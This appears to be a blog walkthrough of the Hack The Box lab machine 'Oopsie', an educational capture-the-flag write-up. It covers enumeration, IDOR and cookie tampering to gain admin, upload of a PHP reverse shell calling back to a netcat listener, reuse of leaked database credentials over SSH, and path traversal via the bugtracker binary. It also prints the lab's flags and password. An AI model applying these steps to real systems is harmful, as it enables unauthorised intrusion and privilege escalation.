top of page
Search

Oopsie

  • Admin
  • Jul 1, 2022
  • 3 min read


Enumeration


As usual let's start with nmap

nmap -sV -sC 10.129.95.191
ree

Port 80 is open so let's check the website.

Open your browser and type in the url bar: http://10.129.95.191

ree

As usual let's start with gobuster. Locate the wordlist we are going to use first.

locate big.txt
ree

Let's use the wordlist :

/opt/useful/SecLists/Discovery/Web-Content/big.txt


gobuster dir -u 10.129.95.191 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt
ree

Let's use BurpSuite. Open Burpsuite and click on the Proxy tab

Turn off intercept

Click on Open Browser

In the url bar, type http://10.129.95.191

Go back to Burp and click on the Target tab

ree

We found something interested, a directory called /cdn-cgi/login

This directory was not picked up by our gobuster earlier.


Let's open our browser from our VM and in the url bar, type:

http://10.129.95.191/cdn-cgi/login

ree

We do not know any credentials but there is a link "Login as Guest"

Click on "Login as Guest"

ree

We are logged in!


Let's click on Account

ree

We are logged in as user guest, access ID 2233


Look at the url bar:


What if we were to change &id=2 into &id=1


Let's try, change the url at the end and press enter

ree

Now we can see there is another user called admin with access ID 34322


We were not meant to see that, but it is a vulnerability of the target machine.


So we just learned that the user guest has a access ID of 2233 and the user admin has a access ID of 34322


Now let's click on the Uploads tab on the website:

ree

This action require super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!


Right click on this web page and click on Inspect (Q)

Now Click on the Storage tab, we can see the following cookie:

ree

At the moment we are logged in as the user guest with access ID 2233

What if we could change the cookie so that we are now user admin with access ID 34322


Let's try! Replace guest by admin and replace 2233 by 34322

ree

Now refresh the uploads page and we now get the following:

ree

We are now admin and we can now upload files!




Foothold


Now let's try to upload a file.


Let's first locate the php reverse shell file and edit it


Open a new command prompt from your VM and type:

locate webshells/php
ree

cd /usr/share/webshells/php

then:

ls
ree

We are interested in php-reverse-shell.php


Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php
ree
My username is htb-sneakymouse on my VM, this is why I used /htb_sneakymouse Replace this by your own username.

Now open a brand new command prompt and type:

ls
ree

I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php
ree

Scroll down until you see $ip and $port

ree

we need to change both ip and port

- replace 127.0.0.1 by the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 by 4444 (we will listen on port 4444 when we set up our netcat later)

ree

Press Ctrl + X to exit

Press Y (to save)

Press enter


Now let's upload this file on the target machine. Let's go back to the upload tab on the website:

ree

We can now click on Browse

We select our file oopsie.php and click on Open

ree

Now click on Upload

ree

Looks like our file oopsie.php has been uploaded successfully. However we still don't know where it has been uploaded.


Remember earlier when we did the gobuster command, it found a directory called /uploads

Perhaps this is where the file has been uploaded!


First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444
ree

Now let's try to locate and run oopsie.php we just uploaded to our target machine. In the url search bar, type:


Nothing should happen but if you go back to your netcat (nc) command prompt, you should now have a shell:

ree

Type

whoami
ree

Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'
ree

ls
ree

cd home 
ls
ree


cd robert
ls
ree

cat user.txt
ree

f2c74ee8db7983851ab2a96a44eb7981


Congratulations! you got the user flag!




Lateral Movement


sudo -l
ree

Unfortunately, we don't have the password


Let's explore the files on the target machine. Let's start with var/www/html

cd /var/www/html
ree

ls
ree

cd cdn-cgi
ls
ree

cd login
ls
ree

cat db.php
ree

Looks like we found some credentials

username: robert

password: M3g4C0rpUs3r!


This shell is not super stable but now we have some credentials!


We know from the nmap at the beginning that port 22 which is associated with ssh is open on the target machine. Let's try to ssh using roberts' credentials

ssh robert@10.129.95.191
ree

The password is

M3g4C0rpUs3r!


ree

We are in!

id
ree

Privilege Escalation

locate bugtracker
ree

cd /usr/bin
ree

bugtracker
ree

type 1 for instance

ree


bugtracker
ree

this time, type hello for instance

ree

Interesting this time we get /root/reports/hello: No such file or directory


bugtracker

this time type:

../root.txt
ree

Congratulations! you found the root flag!


af13b0bee69f8a877c3faf667f7beacf

 
 
 

Recent Posts

See All

©2025 by My Tech On IT

bottom of page